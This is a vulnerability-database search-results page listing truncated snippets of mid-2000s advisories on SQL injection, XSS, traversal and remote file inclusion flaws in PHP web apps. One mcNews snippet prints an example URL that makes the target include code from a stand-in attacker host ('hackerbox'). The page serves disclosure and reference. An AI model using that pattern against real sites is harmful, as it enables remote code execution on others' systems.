8799 matches found
Claroline E-Learning 1.51.6 - userInfo.php Multiple SQL Injections
Claroline E-Learning 1.51.6 - userInfo.php Multiple SQL Injections source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied...
Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application...
Claroline 1.5/1.6 - 'toolaccess_details.php?tool' Cross-Site Scripting
source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application...
AlstraSoft20.txt
This is a multi-part message in MIME format. ------=NextPart000001201C53726.5C0BF6A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory Hsc Security Group http://www.hackerscenter.com/...
ModernBill <= 4.3.0 Multiple Vulnerabilities
The version of ModernBill installed on the remote host is subject to multiple vulnerabilities : - A Remote File Include Vulnerability The application fails to sanitize the parameter 'DIR' before using it in the script 'news.php'. An attacker can exploit this flaw to browse or execute arbitrary...
phpCoin 1.2 - auxpage.php?page Traversal Arbitrary File Access
phpCoin 1.2 - auxpage.php?page Traversal Arbitrary File Access source: https://www.securityfocus.com/bid/12917/info Multiple remote input validation vulnerabilities affect phpCoin. Multiple SQL injection vulnerabilities have been reported. An attacker may leverage these issues to manipulate and...
phpCoin 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access
source: https://www.securityfocus.com/bid/12917/info Multiple remote input validation vulnerabilities affect phpCoin. Multiple SQL injection vulnerabilities have been reported. An attacker may leverage these issues to manipulate and view arbitrary database contents. phpCoin is also affected by a...
CVE-2005-0879
CVE-2005-0879 affects Vortex Portal Content Management System. It is a PHP remote file inclusion flaw in content.php and index.php that lets an attacker execute arbitrary PHP code by passing a URL in the act parameter. Documented impact per NVD: partial confidentiality, integrity, and availabilit...
Vortex Portal 2.0 - content.php?act Remote File Inclusion
Vortex Portal 2.0 - content.php?act Remote File Inclusion source: https://www.securityfocus.com/bid/12878/info Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input. It is...
McNews 1.x - 'install.php' Arbitrary File Inclusion
source: https://www.securityfocus.com/bid/12835/info mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script. This issue is reported to affect mcNews versions 1.3 a...
PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ============================================================== PHP mcNews = 1.3 skinfile Remote File Include Vulnerability ============================================================== Example: if registerglobals=on and allowurlfopen=on:...
PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...
security flaw
Firefox before 1.0.1 and Mozilla before 1.7.6 does not restrict xsl:include and xsl:import tags in XSLT stylesheets to the current domain, which allows remote attackers to determine the existence of files on the local system...
CubeCart < 2.0.5 Multiple Vulnerabilities
The version of CubeCart on the remote host is vulnerable to a local file include issue, along with related cross-site scripting and path disclosure issues, due to a failure to sanitize user-supplied data. Successful exploitation of this issue may allow an attacker to execute arbitrary code on the...
pmachineExec.txt
This is a multi-part message in MIME format. ------=NextPart000000001C516AC.9C269F50 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit pMachine Pro / pMachine Free Remote Code Execution vendor website: http://www.pmachine.com I. BACKGROUND PMachine is one of the most...
Mambo Content Server Detection Global Variables Overwrite
Binary data 2638.prm...
phpmyadmin -- arbitrary file include and XSS vulnerabilities
A phpMyAdmin security announcement reports: We received two bug reports by Maksymilian Arciemowicz about those vulnerabilities and we wish to thank him for his work. The vulnerabilities apply to those points: css/phpmyadmin.css.php was vulnerable against $cfg and GLOBALS variable injections. This...
[Full-Disclosure] pMachine Pro / pMachine Free Remote Code Execution
pMachine Pro / pMachine Free Remote Code Execution vendor website: http://www.pmachine.com I. BACKGROUND PMachine is one of the most flexible & creative on-line publishing tools available. With PMachine you can publish any kind of web content - from a basic weblog to an advanced, interactive...
ss11012005.txt
/ / / \ / / / / / \ \ \ \ / / / / / \ / / // / / / / / / / / / // // / / / // / / / / // , / // / /// // //// // ,/ // / // \ / / / // / / // / /// , / // Ref: SS11012005 SYSTEMSECURE.ORG - Advisory/Exploit PUBLIC ADVISORY Software: MPM Guestbook Pro 1.05 maybe all versions Link:...
phpcalendar.txt
GulfTech Security Research December 28th, 2004 Vendor : Sean Proctor URL : http://php-calendar.sourceforge.net/ Version : All Versions Risk : File Include Vulnerability Description: I was searching for a decent calendar which my group at school could use to keep track of events, etc. We were...